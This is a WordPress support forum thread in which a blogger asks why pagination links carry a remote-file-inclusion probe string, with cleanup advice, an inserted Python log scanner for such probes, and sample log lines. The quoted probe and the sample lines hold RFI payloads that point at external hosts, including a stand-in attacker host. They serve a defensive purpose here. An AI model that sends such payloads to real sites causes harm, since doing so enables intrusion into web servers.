• Long post below, but my thanks in advance for taking the time to read this. My blog was recently hacked and I have been struggling for a week to figure out how it was done. Here’s my blog:

    https://theawesomer.com

    The hack manifests itself if you click on the page numbers at the bottom of the page. E.g., the links have been appended with:

    ?_SERVERDOCUMENT_ROOT=http%3A%2F%2Fwww.peb.com.ua%2Fua%2Freadme.txt%3F%3F%3F

    Several notes:
    1. The modified links are transient. I have personally seen the hacked links there one minute, gone the next, despite having done nothing on my end. The majority of visitors never see these hacked links.
    2. The hack doesn’t seem to do anything, and may have been a failed attempt. It doesn’t actually redirect or launch any application.
    3. These modified links are seen on the site itself, not just server logs and traffic statistics. I’ve seen them myself, as have several colleagues and concerned visitors.

    I am a total neophyte to hacking, but after some googling I think I narrowed it down to an RFI (remote file inclusion) hack. I turned Off register_globals, allow_url_fopen, and allow_url_include. They were all set to On previously.

    I also:
    1. Upgraded WordPress from 2.6 to 2.8.1 (and now 2.8.2 with the XSS fix)
    2. Upgraded all plugins
    3. Set .htaccess to block libwww-perl and prevent query strings with “http” in them
    4. Set Super Cache to stop caching /page/.

    I paid special attention to my pagination plugin, since that’s where the hack manifests itself. I was previously using Lester Chan’s WP-pagenavi which I upgraded along with WordPress. The result — no change. So, I tried another pagination plugin, WP Page Numbers — still no change.

    By far the most effective measure has been setting Super Cache to stop caching /page/, but this has not stopped the hacks completely.

    I still see them in my Apache logs. The IPs seem to be legitimate traffic (normal visitors), proven by the fact that I and my friends have seen the same hacked links on our computers. Shouldn’t an RFI attack originate remotely? Why has it been able to actually modify my links?

    I’ve even downloaded a complete copy of all files in my public_html directory (including all WordPress files) and exported my MySQL database to search for any trace of the hack — “peb.com.ua” or “DOCUMENT_ROOT” — and it’s just not there.

    So, I guess my questions are these: What exactly is happening to my site, and how do I keep it from happening again?

    Thank you!
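    The probe string quoted in the first post can be picked out of Apache access logs mechanically. The following is an added example, not code from the thread: it parses combined-format log lines (all constructed here, with documentation IPs and .invalid hosts) and flags requests whose query string carries a remote URL as a parameter value, or whose parameter name is aimed at a PHP superglobal, which only has any effect while register_globals is On. It matches on a URL scheme rather than the bare word "http", because the .htaccess rule described above would also block an ordinary site search for "http server".

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-log lines (not the thread's real logs).
SAMPLE_LOG = """\
203.0.113.5 - - [20/Jul/2009:10:01:02 -0400] "GET /page/2/?_SERVER[DOCUMENT_ROOT]=http%3A%2F%2Fwww.example.invalid%2Freadme.txt%3F%3F%3F HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
198.51.100.7 - - [20/Jul/2009:10:01:09 -0400] "GET /page/2/ HTTP/1.1" 200 18201 "-" "Mozilla/5.0"
198.51.100.9 - - [20/Jul/2009:10:02:11 -0400] "GET /?s=http+server HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
203.0.113.5 - - [20/Jul/2009:10:03:40 -0400] "GET /wp-content/plugins/foo/bar.php?GLOBALS[dir]=ftp://attacker.invalid/s.txt? HTTP/1.1" 404 200 "-" "libwww-perl/5.805"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# A parameter value that is itself a URL is the hallmark of a remote-file-inclusion probe.
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# Parameter names aimed at PHP superglobals only matter when register_globals is On.
# Prefix match (case-sensitive) so the bracket-stripped "_SERVERDOCUMENT_ROOT" form
# seen in the rewritten pagination links is caught as well as "_SERVER[DOCUMENT_ROOT]".
SUPERGLOBAL = re.compile(r'^(?:_SERVER|_ENV|_GET|_POST|_COOKIE|_REQUEST|GLOBALS)')


def rfi_findings(line):
    """Return a finding dict for one log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not a combined-format line; skip rather than guess
    query = urlsplit(m.group('target')).query
    reasons = []
    # parse_qsl percent-decodes names and values, so "http%3A%2F%2F" becomes "http://".
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_URL.match(value):
            reasons.append('remote URL as value of %r' % name)
        if SUPERGLOBAL.match(name):
            reasons.append('parameter name targets a PHP superglobal: %r' % name)
    if not reasons:
        return None
    return {'ip': m.group('ip'), 'target': m.group('target'),
            'ua': m.group('ua'), 'reasons': reasons}


def scan(log_text):
    """Scan a whole access log and return one finding per suspicious request."""
    return [f for f in map(rfi_findings, log_text.splitlines()) if f]


if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f['ip'], f['ua'], f['target'], '; '.join(f['reasons']))
```

    Run as a script it reports the two probe requests and leaves the `?s=http+server` search alone; grouping the findings by client IP and User-Agent is the quickest way to separate the scanner from the real visitors who later received the poisoned cached page.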

Viewing 3 replies - 1 through 3 (of 3 total)
  • $DOCUMENT_ROOT is a predefined variable in PHP.

    When you say you downloaded the files and are looking for any trace … how are you looking? You won't find that file name anywhere. It's not a file.

    I can't tell whether or not you know that, which is why I'm asking.

    I've more to say but I'll wait.

    Your links are changed.

    Disable, then **DELETE ALL your plugins off the server.

    Do the links go back to being normal?

    No ->

    Change to a FRESHLY uploaded copy of the default theme. **DELETE all the other themes off the server.

    Do the links go back to being normal?

    No ->

    Inside your database, in the options table is a row that stores your active plugins – MAKE SURE that you don't have any hidden malicious plugins being loaded. You can tell because the path won't be to the normal plugins/plugin name; it will be /tmp/xcrts.php or some crap like that.

    If you find any entries like that — come back here and share.

    I've omitted the “reupload ALL fresh files” option because I'm giving you the benefit of the doubt that you deleted before uploading. You need to make sure that there are NO stray files left in any dirs, and that ALL of the WordPress files on your site are 2.8.2 files — not 2.8.2 files with some leftover 2.6.x files, etc.

    Any files or dirs not previously mentioned above that haven't been uploaded fresh need to be opened and looked at: wp-config.php, for example.

    Housekeeping is key.

    Finally, when I said “**DELETE” in the first couple of paragraphs above — you can download backups of those dirs to your local machine, and then delete them.

    Thread Starter aznbbj (@aznbbj)

    Thanks whooami! I will try the steps you suggested and get back to you with my findings.

    In answer to your first question, I used grep while ssh’d to my server, and OS X’s Spotlight after I had downloaded all my files and database, to search for any “peb.com.ua” or “document” occurrences within my files.

    The first search for peb.com.ua came up negative, while the second search found this line in xmlrpc.php twice:

    $filename = preg_replace('#https?://.+?/#', $_SERVER['DOCUMENT_ROOT'].'/', $filename);

    … which seems to be normal?

  • The topic ‘Blog hacked’ is closed to new replies.